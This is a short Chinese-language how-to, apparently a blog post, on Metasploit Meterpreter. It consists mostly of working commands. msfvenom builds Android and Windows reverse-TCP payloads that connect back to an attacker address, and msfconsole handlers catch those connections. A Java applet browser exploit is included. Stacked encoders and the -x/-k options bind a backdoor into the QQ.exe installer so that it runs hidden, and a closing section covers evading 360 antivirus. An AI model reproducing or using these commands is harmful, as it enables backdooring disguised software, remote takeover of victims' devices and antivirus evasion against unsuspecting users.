meterpreter 使用指南

针对 Android

生成apk

1
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 R > androTor.apk

设置服务器接收

以下在msfconsole中操作:

1
2
3
4
5
6
7
8
9
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit

针对 Win 8

java applet

可以参考以下视频演示

1
2
3
4
5
6
7
8
9
10
11
use exploit/multi/browser/java_signed_applet
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST <attacker's ip addr>
set LHOST <attacher's ip addr>
exploit

可执行文件

此处可以参考这个视频

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 10 > EXPLOIT.exe

混合大法

1
2
3
4
5
6
7
8
9
10
11
R raw
-c 编码次数
-x 这个是对某一个软件附加payload的选项。比如msfencode -i shell.exe –x qq.exe 这个命令就是说我把一个叫做shell.exe的后门添加到了一个叫做qq.exe的软件里面。
-k 如果你使用了-x和-k参数。当你的payload运行后,它会从原始的主文件中分离出来,单独创建一个进程,并且运行。这个也是一个免杀的思路。
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=8080 R \
| msfencode -e x86/shikata_ga_nai -c 5 -t raw \
| msfencode -e x86/alpha_upper -c 2 -t raw \
| msfencode -e x86/shikata_ga_nai -c 5 -t raw \
| msfencode -e x86/countdown -c 5 -t exe -x /home/ray/dev/hack/backdoor/QQ.exe \
-k -o /home/ray/dev/hack/backdoor/QQHD.exe

查看编码器

1
2
3
4
5
msfvenom --list
x86/shikata_ga_nai
x86/alpha_upper
x86/countdown

文件混合

1
msfvenom -a x86 --platform windows -x /home/ray/dev/hack/backdoor/QQ.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8080 -b "\x00" -f exe -e x86/shikata_ga_nai -i 17 -o qqbd.exe

bypass AV

主要以360为测试对象,对于特征查杀,Meterpreter基本可以依靠编码器/加密通过,不过行为查杀较难通过。

[1] 那些年一起绕过的杀软
[2] 好免杀,hyperion造
[3] 闲谈 bypass AV
[4] encode msf shellcode绕过杀毒
[5] Veil—绕过杀毒软件的payload生成器
[6] UPX以及数字签名

参考资料

[1] Meterpreter Guide - wooyun知识库
[2] 《Metasploit 渗透测试魔鬼训练营》
[3] 玩转Metasploit系列(第六集)- Freebuf
[4] Kali 官方指导
[5] MSF 目录树
[6] 初探 Meterpreter
[7] metasploit网马的简单提取